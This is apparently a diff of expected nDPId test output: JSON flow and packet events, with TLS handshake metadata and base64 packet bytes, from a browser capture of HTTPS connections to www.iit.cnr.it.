-00877{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":125,"source":"firefox.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620927999109,"flow_last_seen":1620927999143,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":680,"flow_tot_l4_payload_len":680,"flow_avg_l4_payload_len":170,"midstream":0,"thread_ts_msec":1620927999143,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51599,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"df208241e7f3897d4ca38cfe68eabb21","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00877{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":126,"source":"firefox.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620927999112,"flow_last_seen":1620927999148,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":680,"flow_tot_l4_payload_len":680,"flow_avg_l4_payload_len":170,"midstream":0,"thread_ts_msec":1620927999148,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51601,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"df208241e7f3897d4ca38cfe68eabb21","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00916{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":156,"source":"firefox.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620927999111,"flow_last_seen":1620927999169,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":680,"flow_tot_l4_payload_len":940,"flow_avg_l4_payload_len":156,"midstream":0,"thread_ts_msec":1620927999169,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51600,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.iit.cnr.it","ja3":"df208241e7f3897d4ca38cfe68eabb21","ja3s":"2253c82f03b621c5144709b393fde2c9","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00916{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":159,"source":"firefox.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620927999109,"flow_last_seen":1620927999170,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":680,"flow_tot_l4_payload_len":940,"flow_avg_l4_payload_len":156,"midstream":0,"thread_ts_msec":1620927999170,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51599,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.iit.cnr.it","ja3":"df208241e7f3897d4ca38cfe68eabb21","ja3s":"2253c82f03b621c5144709b393fde2c9","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00916{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":163,"source":"firefox.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620927999112,"flow_last_seen":1620927999179,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":680,"flow_tot_l4_payload_len":940,"flow_avg_l4_payload_len":156,"midstream":0,"thread_ts_msec":1620927999179,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51601,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.iit.cnr.it","ja3":"df208241e7f3897d4ca38cfe68eabb21","ja3s":"2253c82f03b621c5144709b393fde2c9","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5441,"source":"firefox.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1065,"flow_first_seen":1620927997754,"flow_last_seen":1620927999853,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":891202,"flow_avg_l4_payload_len":836,"midstream":0,"thread_ts_msec":1620927999948,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51577,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} -00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5441,"source":"firefox.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":1031,"flow_first_seen":1620927998782,"flow_last_seen":1620927999948,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":869503,"flow_avg_l4_payload_len":843,"midstream":0,"thread_ts_msec":1620927999948,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51583,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} -00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5441,"source":"firefox.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":1387,"flow_first_seen":1620927998806,"flow_last_seen":1620927999915,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1189641,"flow_avg_l4_payload_len":857,"midstream":0,"thread_ts_msec":1620927999948,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51588,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} -00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5441,"source":"firefox.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":434,"flow_first_seen":1620927999109,"flow_last_seen":1620927999830,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":353696,"flow_avg_l4_payload_len":814,"midstream":0,"thread_ts_msec":1620927999948,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51599,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} -00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5441,"source":"firefox.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":646,"flow_first_seen":1620927999111,"flow_last_seen":1620927999879,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":545091,"flow_avg_l4_payload_len":843,"midstream":0,"thread_ts_msec":1620927999948,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51600,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} -00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5441,"source":"firefox.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":878,"flow_first_seen":1620927999112,"flow_last_seen":1620927999897,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":744373,"flow_avg_l4_payload_len":847,"midstream":0,"thread_ts_msec":1620927999948,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51601,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"firefox.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1620927997754,"flow_last_seen":1620927997754,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1620927997754,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51577,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"firefox.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1620927997754,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1620927997754,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGrBvAqAGykjA6Esl5AbuZmizAAAAAALAC\/\/9OVwAAAgQFtAEDAwUBAQgKNAyUbQAAAAAEAgAA"} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"firefox.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1620927997781,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1620927997781,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGuB+SMDoSwKgBsgG7yXkJiZGFmZoswaAS\/oiCawAAAgQFrAQCCAo8IAcuNAyUbQEDAwc="} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"firefox.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1620927997781,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1620927997781,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGrCfAqAGykjA6Esl5AbuZmizBCYmRhoAQECyfcgAAAQEICjQMlIc8IAcu"} +00875{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"firefox.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620927997754,"flow_last_seen":1620927997782,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1620927997782,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51577,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"aa7744226c695c0b2e440419848cf700","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00916{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"firefox.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620927997754,"flow_last_seen":1620927997814,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1620927997814,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51577,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.iit.cnr.it","ja3":"aa7744226c695c0b2e440419848cf700","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":30,"source":"firefox.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1620927998782,"flow_last_seen":1620927998782,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1620927998782,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51583,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":30,"source":"firefox.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1620927998782,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1620927998782,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGrBvAqAGykjA6Esl\/AbveSGQcAAAAALAC\/\/\/OTgAAAgQFtAEDAwUBAQgKNAyYZQAAAAAEAgAA"} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":42,"source":"firefox.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1620927998806,"flow_last_seen":1620927998806,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1620927998806,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51588,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":42,"source":"firefox.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1620927998806,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1620927998806,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGrBvAqAGykjA6EsmEAbtCftk8AAAAALAC\/\/\/03wAAAgQFtAEDAwUBAQgKNAyYeQAAAAAEAgAA"} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":43,"source":"firefox.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1620927998817,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1620927998817,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGuB+SMDoSwKgBsgG7yX\/JSxfE3khkHaAS\/oi4VgAAAgQFrAQCCAo8IAs5NAyYZQEDAwc="} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":44,"source":"firefox.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1620927998817,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1620927998817,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGrCfAqAGykjA6Esl\/AbveSGQdyUsXxYAQECzVWgAAAQEICjQMmII8IAs5"} +00876{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":45,"source":"firefox.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620927998782,"flow_last_seen":1620927998820,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":680,"flow_tot_l4_payload_len":680,"flow_avg_l4_payload_len":170,"midstream":0,"thread_ts_msec":1620927998820,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51583,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"df208241e7f3897d4ca38cfe68eabb21","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":48,"source":"firefox.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1620927998833,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1620927998833,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGuB+SMDoSwKgBsgG7yYRFBnlrQn7ZPaAS\/ogBdQAAAgQFrAQCCAo8IAtKNAyYeQEDAwc="} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":49,"source":"firefox.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1620927998833,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1620927998833,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGrCfAqAGykjA6EsmEAbtCftk9RQZ5bIAQECwefwAAAQEICjQMmJA8IAtK"} +00876{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":62,"source":"firefox.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620927998806,"flow_last_seen":1620927998850,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":680,"flow_tot_l4_payload_len":680,"flow_avg_l4_payload_len":170,"midstream":0,"thread_ts_msec":1620927998850,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51588,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"df208241e7f3897d4ca38cfe68eabb21","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00915{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":63,"source":"firefox.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620927998782,"flow_last_seen":1620927998850,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":680,"flow_tot_l4_payload_len":940,"flow_avg_l4_payload_len":156,"midstream":0,"thread_ts_msec":1620927998850,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51583,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.iit.cnr.it","ja3":"df208241e7f3897d4ca38cfe68eabb21","ja3s":"2253c82f03b621c5144709b393fde2c9","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00915{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":68,"source":"firefox.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620927998806,"flow_last_seen":1620927998877,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":680,"flow_tot_l4_payload_len":940,"flow_avg_l4_payload_len":156,"midstream":0,"thread_ts_msec":1620927998877,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51588,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.iit.cnr.it","ja3":"df208241e7f3897d4ca38cfe68eabb21","ja3s":"2253c82f03b621c5144709b393fde2c9","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":84,"source":"firefox.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1620927999109,"flow_last_seen":1620927999109,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1620927999109,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51599,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":84,"source":"firefox.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1620927999109,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1620927999109,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGrBvAqAGykjA6EsmPAbugsPXqAAAAALAC\/\/947AAAAgQFtAEDAwUBAQgKNAyZgQAAAAAEAgAA"} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":85,"source":"firefox.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1620927999111,"flow_last_seen":1620927999111,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1620927999111,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51600,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":85,"source":"firefox.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1620927999111,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1620927999111,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGrBvAqAGykjA6EsmQAbsCvXBwAAAAALAC\/\/+cWAAAAgQFtAEDAwUBAQgKNAyZggAAAAAEAgAA"} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":86,"source":"firefox.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1620927999112,"flow_last_seen":1620927999112,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1620927999112,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51601,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":86,"source":"firefox.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1620927999112,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1620927999112,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGrBvAqAGykjA6EsmRAbvLRPiuAAAAALAC\/\/9LkAAAAgQFtAEDAwUBAQgKNAyZgwAAAAAEAgAA"} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":114,"source":"firefox.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1620927999138,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1620927999138,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGuB+SMDoSwKgBsgG7yY9yeaT2oLD166AS\/ogrVAAAAgQFrAQCCAo8IAx5NAyZgQEDAwc="} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":115,"source":"firefox.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1620927999138,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1620927999138,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGuB+SMDoSwKgBsgG7yZBJLtVRAr1wcaAS\/ohHrwAAAgQFrAQCCAo8IAx6NAyZggEDAwc="} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":118,"source":"firefox.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1620927999138,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1620927999138,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGrCfAqAGykjA6EsmPAbugsPXrcnmk94AQECxIWgAAAQEICjQMmZw8IAx5"} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":119,"source":"firefox.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1620927999138,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1620927999138,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGrCfAqAGykjA6EsmQAbsCvXBxSS7VUoAQECxktgAAAQEICjQMmZw8IAx6"} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":122,"source":"firefox.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1620927999140,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1620927999140,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGuB+SMDoSwKgBsgG7yZFyBGfZy0T4r6AS\/og7hgAAAgQFrAQCCAo8IAx9NAyZgwEDAwc="} 